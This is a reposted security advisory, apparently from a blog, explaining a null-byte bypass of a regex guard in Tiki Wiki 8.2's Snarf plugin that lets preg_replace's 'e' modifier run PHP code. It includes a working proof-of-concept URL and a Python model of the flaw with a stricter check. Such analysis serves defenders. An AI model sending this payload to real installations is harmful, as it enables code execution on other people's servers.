Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection
The vulnerable code is located in /lib/wiki-plugins/wikiplugin_snarf.php, lines 170-173:
170. // If the user specified a more specialized regex
171. if ( isset($params['regex']) && isset($params['regexres']) && preg_match('/^(.)(.)+\1[^e]*$/', $params['regex']) ) {
172. $snarf = preg_replace( $params['regex'], $params['regexres'], $snarf );
173. }
Input passed through $_REQUEST['regex'] is checked by the regular expression at line 171, which is meant to prevent execution of arbitrary PHP code via the 'e' modifier in the call to preg_replace() at line 172: the value must start and end with the same delimiter character and may be followed only by characters other than 'e'.
This check can be bypassed with a null byte injection, by requesting a URL like this:
http:///tiki-8.2/snarf_ajax.php?url=1&regexres=phpinfo()&regex=//e%00/
The value '//e\0/' satisfies the check because the guard's middle group '(.)+' swallows the real closing delimiter (the second '/') together with the 'e' modifier and the null byte, and the trailing '/' then satisfies the '\1' back-reference with nothing after it. PHP's pattern parser, however, takes the second '/' as the end of the expression, reads 'e' as a modifier and stops scanning modifiers at the null byte, so the trailing '/' never reaches its "Unknown modifier" check; without the null byte, '//e/' would still pass the guard but preg_replace() would reject '/' as a modifier and return NULL. The replacement string $params['regexres'] is then evaluated as PHP code, here phpinfo(). (Later PHP releases refuse patterns containing a null byte with a "Null byte in regex" warning, and the 'e' modifier itself was deprecated in PHP 5.5 and removed in PHP 7.0.)
Tiki's internal filters strip all null bytes from user input, but for some reason this does not happen within admin sessions. Successful exploitation therefore requires a user account with administrator rights and the 'PluginSnarf' plugin to be enabled (it is not enabled by default).
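To make the bypass concrete, here is an added Python model (example code, not taken from the advisory, from Tiki or from PHP) of the two pieces that disagree: the line-171 guard regex, transcribed as-is, and a stand-in for PHP's pattern/modifier parser. php_parse_pattern is an assumption about that parser's behaviour, only as faithful as these inputs need, and hardened_guard_accepts is a suggested stricter check, not Tiki's actual fix. The sample patterns and the query string are constructed from the advisory's PoC.

```python
import re
from urllib.parse import parse_qs

# Guard from wikiplugin_snarf.php line 171, transcribed to a Python regex.
# Python's re supports the \1 back-reference, so it behaves like PCRE here.
SNARF_GUARD = re.compile(r'^(.)(.)+\1[^e]*$')

# Modifier letters accepted by preg_* in the PHP 5.x line (assumption: list
# reproduced from memory; 'e' is the one that evaluates the replacement).
PHP_MODIFIERS = set('imsxeADSUXJu')


def guard_accepts(pattern):
    """Return True if the line-171 check would let `pattern` through."""
    return SNARF_GUARD.match(pattern) is not None


def php_parse_pattern(pattern, stop_at_nul=True):
    """Simplified model (not PHP's own source) of how preg_* splits a pattern
    into (body, modifiers). With stop_at_nul=True the modifier scan ends at
    the first NUL byte, the behaviour the advisory relies on; with False a NUL
    is rejected, as later PHP releases do. Raises ValueError where PHP would
    emit a warning and return NULL."""
    if not pattern:
        raise ValueError("Empty regular expression")
    delim = pattern[0]
    if delim.isalnum() or delim == '\\':
        raise ValueError("Delimiter must not be alphanumeric or backslash")
    # Find the closing delimiter, skipping backslash-escaped characters.
    # Only symmetric delimiters such as '/' are modelled (enough for the PoC).
    i, end = 1, -1
    while i < len(pattern):
        if pattern[i] == '\\' and i + 1 < len(pattern):
            i += 2
            continue
        if pattern[i] == delim:
            end = i
            break
        i += 1
    if end == -1:
        raise ValueError("No ending delimiter '%s' found" % delim)
    body, mods = pattern[1:end], pattern[end + 1:]
    if stop_at_nul:
        mods = mods.split('\x00', 1)[0]
    for m in mods:
        if m == '\x00':
            raise ValueError("Null byte in regex")
        if m in ' \n':
            continue
        if m not in PHP_MODIFIERS:
            raise ValueError("Unknown modifier '%s'" % m)
    return body, mods


def code_injection_possible(pattern, stop_at_nul=True):
    """True when the pattern both passes the guard and makes preg_replace()
    evaluate the replacement as PHP code (the 'e' modifier gets applied)."""
    if not guard_accepts(pattern):
        return False
    try:
        _, mods = php_parse_pattern(pattern, stop_at_nul)
    except ValueError:
        return False
    return 'e' in mods


def regex_from_query(query):
    """Decode the advisory's query string the way the web server does:
    %00 becomes a real NUL byte before the value reaches the plugin."""
    return parse_qs(query)['regex'][0]


def hardened_guard_accepts(pattern):
    """A stricter check, added here (not Tiki's own fix): refuse NUL bytes and
    inspect the modifiers the parser will actually apply instead of guessing
    the pattern's shape with a regex."""
    if '\x00' in pattern:
        return False
    try:
        _, mods = php_parse_pattern(pattern, stop_at_nul=False)
    except ValueError:
        return False
    return 'e' not in mods


if __name__ == '__main__':
    # Constructed inputs: the advisory's PoC value plus benign and naive ones.
    poc = regex_from_query('url=1&regexres=phpinfo()&regex=//e%00/')
    for p in ('/foo/i', '/foo/e', '//e/', poc):
        print(repr(p), 'guard:', guard_accepts(p),
              'injectable:', code_injection_possible(p),
              'hardened:', hardened_guard_accepts(p))
```

Running it shows the three-way split the advisory describes: '/foo/e' is stopped by the guard, '//e/' passes the guard but dies in the parser on the stray '/', and only '//e\x00/' passes both, which is exactly why the null byte is needed. The same value is refused by the stricter check, and by the parser model once it rejects NUL bytes.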
This post was written or collected by the site owner and does not represent the site's position. If reposting, please cite the source: http://yesck.com/post/487/